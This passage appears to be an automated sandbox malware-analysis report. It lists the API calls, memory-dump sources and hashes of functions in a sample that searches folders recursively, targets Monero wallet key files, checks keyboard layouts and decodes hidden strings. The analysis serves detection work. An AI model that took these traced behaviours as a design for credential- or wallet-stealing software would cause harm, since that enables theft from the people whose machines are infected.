                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: c53798f54046834b87905fa73ca9c8feef32ceef3b56b2b472f50c2863ec3cc5
                              • Instruction ID: 85de402a5d5259f2ac0153dabeb4fc47fdde89d5df418d0395cf814bb94377e4
                              • Opcode Fuzzy Hash: c53798f54046834b87905fa73ca9c8feef32ceef3b56b2b472f50c2863ec3cc5
                              • Instruction Fuzzy Hash: F712D075A10219DBEB56FB60DC94EEE7378AF64300F404199A58A670D0EF746F89CFA0
                              Function 00FFDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01010C2E), ref: 00FFDE5E
                              • StrCmpCA.SHLWAPI(?,010114C8), ref: 00FFDEAE
                              • StrCmpCA.SHLWAPI(?,010114CC), ref: 00FFDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00FFE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 963ef409ef9249257a234042504c2c41cc53d9f73510c57ba2b2145c18af6d9a
                              • Instruction ID: 523a2e0a64c42a58af66b765ece01038cebdc2ecf99915dcac718791d781b4e0
                              • Opcode Fuzzy Hash: 963ef409ef9249257a234042504c2c41cc53d9f73510c57ba2b2145c18af6d9a
                              • Instruction Fuzzy Hash: CBF18075A14219DAEB5AEB60DD94EEE7338BF34300F4041DA958A670D0EF346B89CF61
                              Function 00FFDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010114B0,01010C2A), ref: 00FFDAEB
                              • StrCmpCA.SHLWAPI(?,010114B4), ref: 00FFDB33
                              • StrCmpCA.SHLWAPI(?,010114B8), ref: 00FFDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00FFDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 5111f1c9e07b8de66f1ae491ebca2a42f9055e0fe6198efbe30cf92ceb9078a9
                              • Instruction ID: c0951c58ca9d7222c39c7b6f3941dd8d0e790f6deb46d0ebc07b1967d74a206d
                              • Opcode Fuzzy Hash: 5111f1c9e07b8de66f1ae491ebca2a42f9055e0fe6198efbe30cf92ceb9078a9
                              • Instruction Fuzzy Hash: 4C912472A00209D7DB15FB70EC59EFD737DAFA4300F408568A98A97194EF349B0D9B91
                              Function 01007B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,010105AF), ref: 01007BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 01007BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 01007C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01007C62
                              • LocalFree.KERNEL32(00000000), ref: 01007D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: e44b0bc819153edc9ea71da33178dc596861b042516fdc9f58d6a5039cb41c2f
                              • Instruction ID: badf8168a4f3360b944052f8533888ae318d2f06be4b117898c7eae3424e6219
                              • Opcode Fuzzy Hash: e44b0bc819153edc9ea71da33178dc596861b042516fdc9f58d6a5039cb41c2f
                              • Instruction Fuzzy Hash: B2412A71A40219EBEB25DB94DC98FEEB7B8FB54700F104199E14AA7180DB342F85CFA0
                              Function 013BA46F Relevance: 10.4, Strings: 7, Instructions: 1605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 11^{$27En$Q*:{$c4u$?~$i~z$mw
                              • API String ID: 0-1993698918
                              • Opcode ID: 3e8be39040764fdbdbb4199daf823cbf813554e05f3e1c82ca868719f2674e87
                              • Instruction ID: f38a4d46240040ac4e053d52b42f2fae22d7f6de5f560b087bf467db48fd1ca8
                              • Opcode Fuzzy Hash: 3e8be39040764fdbdbb4199daf823cbf813554e05f3e1c82ca868719f2674e87
                              • Instruction Fuzzy Hash: FEB24AF360C2049FE3046E2DEC8567ABBE6EF94720F1A493DEAC4C7744EA3558058697
                              Function 00FFE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01010D73), ref: 00FFE4A2
                              • StrCmpCA.SHLWAPI(?,010114F8), ref: 00FFE4F2
                              • StrCmpCA.SHLWAPI(?,010114FC), ref: 00FFE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 186747bf3344839a4bfe73d4d3bab7b9bacc51df0ec0cd12bc1090c4242b06b4
                              • Instruction ID: 61501fa770ffc68648f9b795dfb49909ea11df0914c374754c15f6f3da14f74c
                              • Opcode Fuzzy Hash: 186747bf3344839a4bfe73d4d3bab7b9bacc51df0ec0cd12bc1090c4242b06b4
                              • Instruction Fuzzy Hash: 72122371B10219DAEB16FB70DD95EED7338AF64300F4041A9A58A970D0EF346F49CBA1
                              Function 013CADF2 Relevance: 9.1, Strings: 6, Instructions: 1623COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 34EW$P3y$^]oW$}iv!$}iv!$i^m
                              • API String ID: 0-3732504080
                              • Opcode ID: dc9b05953588d1b5895ce5bec05e5b3e10d99be6bf0c2eecf0cdb289f9eece47
                              • Instruction ID: 19be22cab2ac5ed6c622ae2e6143b7e374cda63d7c69ec2512f7ec2322a1d751
                              • Opcode Fuzzy Hash: dc9b05953588d1b5895ce5bec05e5b3e10d99be6bf0c2eecf0cdb289f9eece47
                              • Instruction Fuzzy Hash: 46B207F3A0C2149FD7046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63558008796
                              Function 013BDAF0 Relevance: 9.1, Strings: 6, Instructions: 1564COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .tSZ$7W-M$]WU$aln{$w+w$r3
                              • API String ID: 0-3914464318
                              • Opcode ID: b850f16eeb641383f7aaaee50cbccd7c6136bd74b92fb7c4b1e14c50ec8cbea4
                              • Instruction ID: 508198f73692b7fda417e121d6fa5cb18ad814a762f598a3da98b462b225566b
                              • Opcode Fuzzy Hash: b850f16eeb641383f7aaaee50cbccd7c6136bd74b92fb7c4b1e14c50ec8cbea4
                              • Instruction Fuzzy Hash: 43B2D4F360C200AFE308AE29EC8567AFBE9EF94720F16493DE6C587740E63558518797
                              Function 013C4994 Relevance: 8.6, Strings: 6, Instructions: 1123COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *3.R$2Z?[$7n_$Qaa$`^?=$sp_}
                              • API String ID: 0-3093853941
                              • Opcode ID: 3e1e5a57e6e5e8d855aa18a8fc608bac59d5567d4aaa752456d689b022894747
                              • Instruction ID: 2d535091cb1ccbed8aaff5d2406155b47c1c6451a374ed8f2d991ee13e1f4fa7
                              • Opcode Fuzzy Hash: 3e1e5a57e6e5e8d855aa18a8fc608bac59d5567d4aaa752456d689b022894747
                              • Instruction Fuzzy Hash: 877208F36082049FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C7744E63598058697
                              Function 013C0F20 Relevance: 7.9, Strings: 5, Instructions: 1608COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8@@"$P({$S1~+$Y-]~$qS?o
                              • API String ID: 0-2724045608
                              • Opcode ID: 81428c76408294c6e559e17ce109a2c035f1087437f137d535df0399946ccbef
                              • Instruction ID: dd9a6cf3c61c9e86aec2c6188c62c4ea64f48ecabe8bbecbc77cb7ddcb9ce341
                              • Opcode Fuzzy Hash: 81428c76408294c6e559e17ce109a2c035f1087437f137d535df0399946ccbef
                              • Instruction Fuzzy Hash: 4FB2F6F3A0C2109FE304AE2DEC85A7AB7E5EFD4720F1A893DE6C4C7744E63558058696
                              Function 00FFC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FFC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FFC87C
                              • lstrcat.KERNEL32(?,01010B46), ref: 00FFC943
                              • lstrcat.KERNEL32(?,01010B47), ref: 00FFC957
                              • lstrcat.KERNEL32(?,01010B4E), ref: 00FFC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
